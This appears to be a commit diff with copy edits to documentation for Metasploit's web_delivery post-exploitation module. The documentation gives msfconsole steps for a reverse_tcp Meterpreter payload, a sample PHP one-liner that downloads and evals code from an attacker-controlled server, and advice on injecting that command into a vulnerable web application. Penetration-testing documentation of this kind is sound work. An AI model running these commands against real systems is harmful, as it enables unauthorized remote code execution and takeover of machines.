Merge pull request #39 from tdoan-r7/mod_doc_cmd
MS-1196 Minor edits to the kb for the web_delivery modulebug/bundler_fix
commit
9aa5f4f03a
|
@ -1,31 +1,26 @@
|
||||||
As a web server, web_delivery provides a great way to deliver a payload during post exploitation,
|
As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
|
||||||
with the intention to stay stealthy because the payload does not touch the disk.
|
|
||||||
|
|
||||||
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
|
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
|
||||||
Powershell. You should be able to tell which one you can use based on the target environment
|
Powershell. You should be able to tell which one you can use based on the target environment
|
||||||
you are in.
|
you are in.
|
||||||
|
|
||||||
For example: if you have gained access through a PHP application, then it's safe to assume you can
|
For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
|
||||||
use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to
|
|
||||||
say the target supports Powershell.
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
To be able to use web_delivery, you must gain access to the target machine first, with the ability
|
To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
|
||||||
to execute either the Python, or PHP, or Powershell interpreter.
|
|
||||||
|
|
||||||
At that point, you would use web_delivery similar to the following example:
|
At that point, you would use the web_delivery module like in the following example:
|
||||||
|
|
||||||
1. Start msfconsole
|
1. Start msfconsole
|
||||||
2. Do: ```use exploit/multi/script/web_delivery```
|
2. Run: ```use exploit/multi/script/web_delivery```
|
||||||
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
|
3. Run: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
|
||||||
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
|
4. Run: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
|
||||||
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
|
5. Run: ```set LHOST IP``` (The IP the payload should connect back to)
|
||||||
6. Do: ```run```
|
6. Do: ```run```
|
||||||
7. At this point, a handler is up for that payload. And the module should instruct you to execute
|
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
|
||||||
a command.
|
8. Copy the command. Depending on your pentesting scenario, you can either inject the
|
||||||
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the
|
command and get code execution, or run it from the target's shell and get a session:
|
||||||
command and get code execution, or run it from the target's shell, and get a session:
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf exploit(web_delivery) > run
|
msf exploit(web_delivery) > run
|
||||||
|
@ -46,14 +41,13 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
|
||||||
|
|
||||||
**Python**
|
**Python**
|
||||||
|
|
||||||
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
|
Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
|
||||||
Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.
|
|
||||||
|
|
||||||
**PHP**
|
**PHP**
|
||||||
|
|
||||||
PHP is a fairly popular language for web servers, especially Apache.
|
PHP is a fairly popular language for web servers, especially Apache.
|
||||||
|
|
||||||
**Powershell/win**
|
**Powershell/Windows**
|
||||||
|
|
||||||
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
|
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
|
||||||
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
|
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
|
||||||
|
@ -68,16 +62,15 @@ web_delivery would work nicely for a web application with a command execution vu
|
||||||
One way to approach this would be:
|
One way to approach this would be:
|
||||||
|
|
||||||
1. Start exploit/multi/script/web_delivery
|
1. Start exploit/multi/script/web_delivery
|
||||||
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that
|
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
|
||||||
results in arbitrary code execution.
|
|
||||||
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
|
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
|
||||||
|
|
||||||
**Shell upgrade**
|
**Shell upgrade**
|
||||||
|
|
||||||
web_delivery is also useful to upgrade a shell type payload to a meterpreter one.
|
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
|
||||||
|
|
||||||
Here's how that can be done:
|
Here's how that can be done:
|
||||||
|
|
||||||
1. Start exploit/multi/script/web_delivery that generates/
|
1. Start exploit/multi/script/web_delivery that generates/
|
||||||
2. On msfconsole, interact with the shell, and copy/pate the command.
|
2. In msfconsole, interact with the shell, and copy/paste the command.
|
||||||
3. You should get a meterpreter session.
|
3. You should get a Meterpreter session.
|
||||||
|
|
Loading…
Reference in New Issue